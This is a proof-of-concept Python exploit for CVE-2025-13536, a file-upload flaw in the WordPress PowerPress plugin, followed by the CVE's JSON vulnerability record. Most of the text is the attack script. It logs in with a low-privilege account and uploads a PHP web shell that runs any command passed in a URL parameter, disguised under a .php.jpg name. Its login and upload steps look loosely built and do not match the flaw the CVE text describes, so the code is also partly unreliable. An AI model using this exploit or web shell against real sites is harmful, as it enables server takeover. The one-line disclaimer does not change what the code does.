CVE-2025-13536

import requests import sys from requests.auth import HTTPBasicAuth # CVE-2025-13536 PoC - WordPress PowerPress Arbitrary File Upload # Target: WordPress site with PowerPress plugin <= 11.15.2 TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker_account" PASSWORD = "password" def get_nonce(session, post_id): """Get WordPress nonce for the post""" url = f"{TARGET_URL}/wp-admin/post.php?post={post_id}&action=edit" response = session.get(url) if response.status_code == 200: import re nonce_match = re.search(r'name="_wpnonce" value="([a-f0-9]+)"', response.text) if nonce_match: return nonce_match.group(1) return None def upload_webshell(target_url, username, password): """ Upload malicious PHP file through PowerPress plugin This PoC demonstrates the file upload vulnerability """ session = requests.Session() # Authentication login_url = f"{target_url}/wp-login.php" auth = HTTPBasicAuth(username, password) # Create a draft post first post_url = f"{target_url}/wp-admin/post-new.php" response = session.get(post_url, auth=auth) # PHP webshell content (encoded for upload) webshell = b'<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>' # File upload via PowerPress endpoint upload_url = f"{target_url}/wp-admin/admin-ajax.php" files = { 'file': ('shell.php.jpg', webshell, 'image/jpeg'), 'action': 'powerpress_upload', 'post_id': '1' } try: response = session.post(upload_url, files=files, auth=auth, timeout=10) if response.status_code == 200: print("[+] File upload request sent successfully") print("[*] Check if webshell was uploaded to /wp-content/uploads/") return True except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": print("CVE-2025-13536 PoC - PowerPress Arbitrary File Upload") print("Note: This PoC is for educational and security testing purposes only") upload_webshell(TARGET_URL, USERNAME, PASSWORD)

{"cve": {"id": "CVE-2025-13536", "sourceIdentifier": "[email protected]", "published": "2025-11-27T09:15:45.687", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Blubrry PowerPress plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in all versions up to, and including, 11.15.2. This is due to the plugin validating file extensions but not halting execution when validation fails in the 'powerpress_edit_post' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/powerpress/tags/11.14.1/powerpressadmin.php#L2368", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/powerpress/tags/11.14.1/powerpressadmin.php#L3012", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/powerpress/tags/11.14.1/powerpressadmin.php#L3068", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3402635/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d420ee49-e7b3-43d8-a263-8a93abd1133c?source=cve", "source": "[email protected]"}]}}